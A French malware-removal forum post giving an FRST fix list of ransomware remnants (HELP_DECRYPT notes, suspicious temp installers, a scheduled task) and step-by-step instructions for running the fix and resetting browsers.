 2015-09-15 08:36 - 2015-09-15 08:36 - 00613255 _____ (CMI Limited) C:\Users\DONBCI\AppData\Local\nso7A0E.tmp 
 2015-09-15 08:07 - 2015-09-15 08:07 - 00613255 _____ (CMI Limited) C:\Users\DONBCI\AppData\Local\nsd7C9A.tmp 
 2015-09-14 21:49 - 2015-09-14 21:47 - 00613255 _____ (CMI Limited) C:\Users\DONBCI\AppData\Local\nsy76E2.tmp 
 2015-09-14 09:14 - 2015-09-14 09:13 - 00613255 _____ (CMI Limited) C:\Users\DONBCI\AppData\Local\nsiC137.tmp 
 2015-09-14 08:42 - 2015-09-14 08:42 - 00613255 _____ (CMI Limited) C:\Users\DONBCI\AppData\Local\nsi86DF.tmp 
 2015-09-14 08:11 - 2015-09-16 08:11 - 00001012 _____ C:\Windows\Tasks\31KF7GHdyOOZkNChPv.job  
 2015-09-14 06:38 - 2015-09-14 06:38 - 00613255 _____ (CMI Limited) C:\Users\DONBCI\AppData\Local\nsh2FC5.tmp 
 2015-09-14 06:02 - 2015-09-14 06:02 - 00613255 _____ (CMI Limited) C:\Users\DONBCI\AppData\Local\nsi7E0C.tmp 
 2015-09-14 06:01 - 2015-09-14 06:01 - 00613255 _____ (CMI Limited) C:\Users\DONBCI\AppData\Local\nsm81E2.tmp 
 2015-09-21 09:32 - 2015-04-08 17:35 - 00000464 _____ C:\Windows\system32\ScannerSettings  
 2015-09-20 09:48 - 2015-04-06 10:29 - 00000004 _____ C:\Windows\system32\029B560A371F4E00AB32838EBC01B9E7  
 2015-09-18 23:07 - 2015-07-30 10:31 - 00191488 _____ C:\Windows\system32\netupdsrv.exe  
 2015-09-18 23:06 - 2015-07-30 10:30 - 00350720 _____ C:\Windows\system32\nethtsrv.exe  
 2015-04-15 03:28 - 2015-04-15 03:28 - 0004387 _____ () C:\Users\DONBCI\AppData\Roaming\31KF7GHdyOOZkNChPv 
 2015-09-22 07:53 - 2015-09-22 07:53 - 0008628 _____ () C:\Users\DONBCI\AppData\Roaming\HELP_DECRYPT.HTML 
 2015-09-22 07:53 - 2015-09-22 07:53 - 0045931 _____ () C:\Users\DONBCI\AppData\Roaming\HELP_DECRYPT.PNG 
 2015-09-22 07:53 - 2015-09-22 07:53 - 0004254 _____ () C:\Users\DONBCI\AppData\Roaming\HELP_DECRYPT.TXT  
 2015-04-15 03:28 - 2015-04-15 03:28 - 0004387 _____ () C:\Users\DONBCI\AppData\Roaming\iemFAWisUZaZqq 
 2015-07-24 12:45 - 2015-08-29 06:50 - 0000091 _____ () C:\Users\DONBCI\AppData\Roaming\WB.CFG  
 2015-09-22 07:50 - 2015-09-22 07:50 - 0008628 _____ () C:\Users\DONBCI\AppData\Local\HELP_DECRYPT.HTML 
 2015-09-22 07:50 - 2015-09-22 07:50 - 0045931 _____ () C:\Users\DONBCI\AppData\Local\HELP_DECRYPT.PNG 
 2015-09-22 07:50 - 2015-09-22 07:50 - 0004254 _____ () C:\Users\DONBCI\AppData\Local\HELP_DECRYPT.TXT  
 2015-09-16 08:46 - 2015-09-16 08:46 - 0613255 _____ (CMI Limited) C:\Users\DONBCI\AppData\Local\nsb293D.tmp 
 2015-09-09 07:51 - 2015-09-09 07:51 - 0613255 _____ (CMI Limited) C:\Users\DONBCI\AppData\Local\nsbDAB3.tmp 
 2015-09-17 15:16 - 2015-09-17 15:16 - 0613255 _____ (CMI Limited) C:\Users\DONBCI\AppData\Local\nsc8F51.tmp 
 2015-09-15 08:07 - 2015-09-15 08:07 - 0613255 _____ (CMI Limited) C:\Users\DONBCI\AppData\Local\nsd7C9A.tmp 
 2015-09-12 06:30 - 2015-09-12 06:30 - 0613255 _____ (CMI Limited) C:\Users\DONBCI\AppData\Local\nse8AF3.tmp 
 2015-07-24 12:42 - 2015-07-24 12:42 - 0628688 _____ (CMI Limited) C:\Users\DONBCI\AppData\Local\nsgB275.tmp 
 2015-09-09 11:04 - 2015-09-09 11:04 - 0613255 _____ (CMI Limited) C:\Users\DONBCI\AppData\Local\nsh2DF1.tmp 
 2015-09-14 06:38 - 2015-09-14 06:38 - 0613255 _____ (CMI Limited) C:\Users\DONBCI\AppData\Local\nsh2FC5.tmp 
 2015-09-07 16:17 - 2015-09-07 16:17 - 0613255 _____ (CMI Limited) C:\Users\DONBCI\AppData\Local\nsh490F.tmp 
 2015-09-10 06:02 - 2015-09-10 06:02 - 0613255 _____ (CMI Limited) C:\Users\DONBCI\AppData\Local\nshA9B8.tmp 
 2015-09-08 12:31 - 2015-09-08 12:31 - 0613255 _____ (CMI Limited) C:\Users\DONBCI\AppData\Local\nshFBF9.tmp 
 2015-09-11 20:59 - 2015-09-11 20:59 - 0613255 _____ (CMI Limited) C:\Users\DONBCI\AppData\Local\nsi38C7.tmp 
 2015-09-14 06:02 - 2015-09-14 06:02 - 0613255 _____ (CMI Limited) C:\Users\DONBCI\AppData\Local\nsi7E0C.tmp 
 2015-09-14 08:42 - 2015-09-14 08:42 - 0613255 _____ (CMI Limited) C:\Users\DONBCI\AppData\Local\nsi86DF.tmp 
 2015-09-14 09:14 - 2015-09-14 09:13 - 0613255 _____ (CMI Limited) C:\Users\DONBCI\AppData\Local\nsiC137.tmp 
 2015-09-08 07:33 - 2015-09-08 07:33 - 0613255 _____ (CMI Limited) C:\Users\DONBCI\AppData\Local\nsm2325.tmp 
 2015-09-14 06:01 - 2015-09-14 06:01 - 0613255 _____ (CMI Limited) C:\Users\DONBCI\AppData\Local\nsm81E2.tmp 
 2015-09-12 07:40 - 2015-09-12 07:40 - 0613255 _____ (CMI Limited) C:\Users\DONBCI\AppData\Local\nsn49F9.tmp 
 2015-09-15 08:36 - 2015-09-15 08:36 - 0613255 _____ (CMI Limited) C:\Users\DONBCI\AppData\Local\nso7A0E.tmp 
 2015-09-12 11:58 - 2015-09-12 11:58 - 0613255 _____ (CMI Limited) C:\Users\DONBCI\AppData\Local\nsr1533.tmp 
 2015-09-08 14:21 - 2015-09-08 14:21 - 0613255 _____ (CMI Limited) C:\Users\DONBCI\AppData\Local\nst639E.tmp 
 2015-09-11 15:52 - 2015-09-11 15:52 - 0613255 _____ (CMI Limited) C:\Users\DONBCI\AppData\Local\nsu576C.tmp 
 2015-09-07 13:37 - 2015-09-07 13:37 - 0613255 _____ (CMI Limited) C:\Users\DONBCI\AppData\Local\nswE409.tmp 
 2015-09-07 14:08 - 2015-09-07 14:08 - 0613255 _____ (CMI Limited) C:\Users\DONBCI\AppData\Local\nsx5233.tmp 
 2015-09-08 10:50 - 2015-09-08 10:50 - 0613255 _____ (CMI Limited) C:\Users\DONBCI\AppData\Local\nsxA214.tmp 
 2015-09-10 07:46 - 2015-09-10 07:46 - 0613255 _____ (CMI Limited) C:\Users\DONBCI\AppData\Local\nsxD547.tmp 
 2015-09-07 15:21 - 2015-09-07 15:20 - 0613255 _____ (CMI Limited) C:\Users\DONBCI\AppData\Local\nsxEC72.tmp 
 2015-09-14 21:49 - 2015-09-14 21:47 - 0613255 _____ (CMI Limited) C:\Users\DONBCI\AppData\Local\nsy76E2.tmp 
 2015-09-16 22:56 - 2015-09-16 22:56 - 0613255 _____ (CMI Limited) C:\Users\DONBCI\AppData\Local\nsy84C4.tmp 
 2015-09-17 14:07 - 2015-09-17 14:07 - 0077312 _____ () C:\Users\DONBCI\AppData\Local\Vaiaholding.exe  
 2015-09-17 14:07 - 2015-09-17 14:07 - 0000187 _____ () C:\Users\DONBCI\AppData\Local\Vaiaholding.exe.config  
 2015-09-22 07:47 - 2015-09-22 07:47 - 0008628 _____ () C:\ProgramData\HELP_DECRYPT.HTML 
 2015-09-22 07:47 - 2015-09-22 07:47 - 0045931 _____ () C:\ProgramData\HELP_DECRYPT.PNG 
 2015-09-22 07:47 - 2015-09-22 07:47 - 0004254 _____ () C:\ProgramData\HELP_DECRYPT.TXT  
 2015-07-23 13:21 - 2015-06-16 08:42 - 0087040 ___SH () C:\ProgramData\msnqoirw.exe
Une fois, le texte coller dans le bloc-note.
Menu Fichier puis Enregistrer sous.
A gauche, place toi sur le bureau.
Dans le champs en bas, nom du fichier mets : fixlist.txt
Clic sur Enregistrer - cela va créer un fichier fixlist.txt sur le bureau.

Relance FRST et clic sur le bouton Corriger / Fix
Selon comment un redémarrage est nécessaire (pas obligatoire).
Un fichier texte apparaît, copie/colle le contenu ici dans un nouveau message.

Redémarre l'ordinateur



puis réinitialise tes navigateurs:
==================================
Réinitialise tes navigateurs et ou manuellement reparamètre tes navigateurs WEB (page de démarrage, moteur de recherche etc) mais aussi supprimer/désactiver les extensions inutiles/parasites :
* Firefox : http://forum.malekal.com/firefox-extens ... 36057.html
* Google Chrome : http://forum.malekal.com/google-chrome- ... 35837.html
* Internet Explorer et modules complémentaires / moteurs de recherche : http://forum.malekal.com/
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas !
Comment protéger son PC des virus
Windows 11 : Compatibilité, Configuration minimale requise, télécharger ISO et installer Windows 11

Comment demander de l'aide sur le forum
Partagez malekal.com : n'hésitez pas à partager les articles qui vous plaisent sur la page Facebook du site.
Haut
  • Sujets similaires
    Réponses
    Vues
    Dernier message

Revenir à « Supprimer/Desinfecter les virus (Trojan, Adwares, Ransomwares, Backdoor, Spywares) »